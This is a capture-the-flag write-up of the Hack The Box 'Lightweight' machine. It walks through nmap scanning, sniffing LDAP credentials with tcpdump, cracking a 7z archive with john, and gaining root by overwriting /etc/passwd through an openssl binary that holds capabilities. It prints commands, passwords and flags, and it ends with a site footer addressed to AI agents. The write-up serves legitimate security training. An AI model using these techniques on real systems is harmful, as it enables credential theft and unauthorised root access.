# Lightweight

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F45h4YWFXhtt6KsKlvyB7%2Flightweight.png?alt=media&#x26;token=d3e03dd3-59d9-4967-9a76-26317f64d0b7" alt=""><figcaption></figcaption></figure>

## Enumeration

As always, we start with the enumeration phase, in which we try to scan the machine looking for open ports and finding out services and versions of those opened ports.

The following nmap command will scan the target machine looking for open ports in a fast way and saving the output into a file:

> nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.119 -oN allPorts

* `-sS` use the **TCP SYN** scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.
* `--min-rate 5000` nmap will try to keep the sending rate **at or above** 5000 packets per second.
* `-p-` scanning the entire port range, **from 1 to 65535**.
* `-T5` **insane** mode, it is the fastest mode of the nmap time template.
* `-Pn` assume the host is **online**.
* `-n` scan without reverse **DNS** resolution.
* `-oN` **save** the scan result into a file, in this case the *allports* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Mon Dec 26 11:31:06 2022 as: nmap -sS --min-rate 5000 -n -Pn -p- -oN allPorts 10.10.10.119
Nmap scan report for 10.10.10.119
Host is up (0.21s latency).
Not shown: 65500 filtered tcp ports (no-response), 32 filtered tcp ports (host-prohibited)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
389/tcp open  ldap

# Nmap done at Mon Dec 26 11:31:34 2022 -- 1 IP address (1 host up) scanned in 28.47 seconds
```

{% endcode %}

Now that we know which ports are open, let's try to obtain the services and versions running on these ports. The following command will scan these ports more in depth and save the result into a file:

> nmap -sC -sV -p22,80,389 10.10.10.119 -oN targeted

* `-sC` performs the scan using the default set of **scripts**.
* `-sV` enables **version** detection.
* `-oN` **save** the scan result into file, in this case the *targeted* file.

{% code overflow="wrap" %}

```bash
# Nmap 7.93 scan initiated Mon Dec 26 11:32:07 2022 as: nmap -sCV -p22,80,389 -oN targeted 10.10.10.119
Nmap scan report for 10.10.10.119
Host is up (0.057s latency).

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey: 
|   2048 1997599a15fdd2acbd8473c429e92b73 (RSA)
|   256 8858a1cf38cd2e151d2c7f7206a35767 (ECDSA)
|_  256 316cc1eb3b280fadd579728ff5b549db (ED25519)
80/tcp  open  http    Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16)
|_http-title: Lightweight slider evaluation page - slendr
389/tcp open  ldap    OpenLDAP 2.2.X - 2.3.X
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=lightweight.htb
| Subject Alternative Name: DNS:lightweight.htb, DNS:localhost, DNS:localhost.localdomain
| Not valid before: 2018-06-09T13:32:51
|_Not valid after:  2019-06-09T13:32:51

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 26 11:32:43 2022 -- 1 IP address (1 host up) scanned in 36.53 seconds
```

{% endcode %}

If we take a look at the website, we'll see a message saying that the site is protected by against bruteforcing.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FnJyLmYcWD1Ed8PcQ3Ij2%2Fimage.png?alt=media&#x26;token=d768e29f-dd18-4c4a-a355-8165962133a8" alt=""><figcaption></figcaption></figure>

The Info page says that the server is protected against bruteforcing, and there is a list of banned IPs in `status.php`.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FytK9eIqOdNe2xZOyzOqq%2Fimage.png?alt=media&#x26;token=c362933a-2281-4e1b-8d03-367aa43e600b" alt=""><figcaption></figcaption></figure>

The list of banned IPs doesn't show any banned IP.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2FARcRh1oivjZv4fI86jEj%2Fimage.png?alt=media&#x26;token=5aadac51-ab6e-44b4-a041-2b2df4a94763" alt=""><figcaption></figcaption></figure>

Finally, the `user.php` page indicates that we can log in to the machine via SSH, with out IP address as the username and password. We can reset our account in the `reset.php` page.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2F6ZXwZBx75GsqhEelOSbM%2Fimage.png?alt=media&#x26;token=66272ccc-f8f5-46ec-b8f7-db1ad382ffc5" alt=""><figcaption></figcaption></figure>

## Exploitation

Let's log in into the machine.

> sshpass -p '10.10.14.3' ssh 10.10.14.3\@10.10.10.119

```
[10.10.14.3@lightweight ~]$ whoami
10.10.14.3
```

As we can see, there are two users called `ldapuser1` and `ldapuser2`.

> grep sh /etc/passwd

```
root:x:0:0:root:/root:/bin/bash
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
apache:x:48:48:Apache:/usr/share/httpd:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
ldapuser1:x:1000:1000::/home/ldapuser1:/bin/bash
ldapuser2:x:1001:1001::/home/ldapuser2:/bin/bash
10.10.14.2:x:1002:1002::/home/10.10.14.2:/bin/bash
127.0.0.1:x:1003:1003::/home/127.0.0.1:/bin/bash
10.10.14.3:x:1004:1004::/home/10.10.14.3:/bin/bash
```

I suppose we have to do pivot to those users to get the flag. If we check for system capabilities, we'll see that the *tcpdump* binary have some capabilities which allow us to run the binary without root permissions.

> getcap -r / 2>/dev/null

```
/usr/bin/ping = cap_net_admin,cap_net_raw+p
/usr/sbin/mtr = cap_net_raw+ep
/usr/sbin/suexec = cap_setgid,cap_setuid+ep
/usr/sbin/arping = cap_net_raw+p
/usr/sbin/clockdiff = cap_net_raw+p
/usr/sbin/tcpdump = cap_net_admin,cap_net_raw+ep
```

Indeed, we can run *tcpdump*.

> tcpdump -i any

```
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on any, link-type LINUX_SLL (Linux cooked), capture size 262144 bytes
```

As we could see in the `user.php` page, there is some kind of traffic going on in the machine which adds and deletes system users. We could run *tcpdump* and intercept all that traffic. I will run the binary with *SSH*, view the traffic with *WireShark* in my local machine.

> sshpass -p '10.10.14.3' ssh 10.10.14.3\@10.10.10.119 "/usr/sbin/tcpdump -i any -w - 'not port 22'" | wireshark -k -i -

Now, we will have to navigate through the website in order to make some traffic, and activate some cron jobs that might be happening on the background. We should be able to intercept an LDAP packet with credentials for the `ldapuser2` user.

<figure><img src="https://1074697697-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FyIspp1QgGM7SFqLfTs4l%2Fuploads%2Fv14Q9JLo2qzqRr87G2ii%2Fimage.png?alt=media&#x26;token=f3cfae23-2686-4a27-bdcc-73bbac55d7cf" alt=""><figcaption></figcaption></figure>

Let's copy the password and become the `ldapuser2` user. Then, we'll be able to grab the user flag.

> su ldapuser2

```
Password: 8bc8251332abe1d7f105d3e53ad39ac2
[ldapuser2@lightweight 10.10.14.3]$ whoami
ldapuser2
[ldapuser2@lightweight 10.10.14.3]$ cat /home/ldapuser2/user.txt
5e6c665d6c3b8c7f4e8ba4449e0b5319
```

## Privilege Escalation

In his home directory there is one interesting file called `backup.7z`.

> ls /home/ldapuser2

```
backup.7z  OpenLDAP-Admin-Guide.pdf  OpenLdap.pdf  user.txt
```

Let's transfer it to our local machine by encoding it in *base64*.

> base64 -w 0 backup.7z

{% code overflow="wrap" %}

```
N3q8ryccAAQmbxM1EA0AAAAAAAAjAAAAAAAAAI5s6D0e1KZKLpqLx2xZ2BYNO8O7/Zlc4Cz0MOpBlJ/010X2vz7SOOnwbpjaNEbdpT3wq/EZAoUuSypOMuCw8Sszr0DTUbIUDWJm2xo9ZuHIL6nVFlVuyJO6aEHwUmGK0hBZO5...
t9qcVa4mCjTpus4e3vJ4gd6iWAt8KT2GmnPjb0+N+tYjcX9U/W/leRKQGX/USF7XWwZioJpI7t/uAAAAABcGjFABCYDAAAcLAQABIwMBAQVdABAAAAyBCgoBPiBwEwAA
```

{% endcode %}

Now, decoded in our local machine.

> echo "N3q8...EwAA" | base64 -d > backup.7z

If we try to decompress the file, we'll see that it is encrypted with a password.

> 7z x backup.7z

```
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs Intel(R) Core(TM) i7-6500U CPU @ 2.50GHz (406E3),ASM,AES-NI)

Scanning the drive for archives:
1 file, 3411 bytes (4 KiB)

Extracting archive: backup.7z
--
Path = backup.7z
Type = 7z
Physical Size = 3411
Headers Size = 259
Method = LZMA2:12k 7zAES
Solid = +
Blocks = 1

    
Enter password (will not be echoed):
```

Let's try to break the password with *john*. First, user the *7z2john* tool to get the file hash.

> 7z2john backup.7z > hash

Now, break the hash with *john*.

> john --wordlist=/usr/share/wordlists/rockyou.txt hash

```
Using default input encoding: UTF-8
Loaded 1 password hash (7z, 7-Zip archive encryption [SHA256 256/256 AVX2 8x AES])
Cost 1 (iteration count) is 524288 for all loaded hashes
Cost 2 (padding size) is 12 for all loaded hashes
Cost 3 (compression type) is 2 for all loaded hashes
Cost 4 (data length) is 3140 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
delete           (backup.7z)     
1g 0:00:04:17 DONE (2022-12-26 18:24) 0.003878g/s 8.005p/s 8.005c/s 8.005C/s slimshady..aries
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Now that we have the password, let's decompress the `backup.7z` file.

> 7z x backup.7z

There are six files in the compressed file, which seems to be the PHP files that compose the website.

> ls -l

```
-rw-r----- 1 root root 4218 Jun 13  2018 index.php
-rw-r----- 1 root root 1764 Jun 13  2018 info.php
-rw-r----- 1 root root  360 Jun 10  2018 reset.php
-rw-r----- 1 root root 2400 Jun 14  2018 status.php
-rw-r--r-- 1 root root 1071 Dec 26 11:32 targeted
-rw-r----- 1 root root 1528 Jun 13  2018 user.php
```

If we take a look at the `status.php` file, we'll find credentials for the `ldapuser1` user.&#x20;

> cat status.php

```
...
$username = 'ldapuser1';
$password = 'f3ca9d298a553da117442deeb6fa932d';
...
```

Let's become the `ldapuser1` user.

> su ldapuser1

```
Password: f3ca9d298a553da117442deeb6fa932d
[ldapuser1@lightweight ldapuser2]$ whoami
ldapuser1
```

In his home directory, there is a binary for *openssl*.

> ls /home/ldapuser1

```
capture.pcap  ldapTLS.php  openssl  tcpdump
```

As we can see, the *openssl* binary has the ep capability which means that we can run it with certain privileges.

{% hint style="info" %}
That binary has ALL the capabilities permitted **(  p  )** and effective **(  e  )** from the start. In the textual representation of capabilities, a leading **=** is equivalent to **all=**.

Such a binary can do whatever it pleases, limited only by the capability bounding set, which on a typical desktop system includes everything.
{% endhint %}

> getcap -r .

```
./tcpdump = cap_net_admin,cap_net_raw+ep
./openssl =ep
```

There is a way to write in files with the *openssl* binary. We will create our own `passwd` file, and replace it with the current `/etc/passwd` file, so we can change the root password. First, make a copy of `/etc/passwd`.

> cp /etc/passwd .

Now, create a new password hash for the `password123` string.

> ./openssl passwd -1 password123

```
$1$rHF.iluF$fDIZKgx/LNNqNKdEBoiua1
```

Copy the password hash, and replace it with the `x` in root line of the `passwd` copy.

> cat passwd

```
root:$1$rHF.iluF$fDIZKgx/LNNqNKdEBoiua1:0:0:root:/root:/bin/bash
```

Finally, replace the `passwd` file with the `/etc/passwd` file using the *openssl* binary in the home directory.

> cat passwd | ./openssl enc -out /etc/passwd

Then, all we have to do is, become the root user with the password we chose, reap the harvest and take the root flag.

> su root

```
Password: password123
[root@lightweight ldapuser1]# whoami
root
[root@lightweight ldapuser1]# cat /root/root.txt 
233ef834cc684d36bdfc251851a43abd
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://alfa8sa.gitbook.io/htb-writeups/linux-machines/lightweight.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.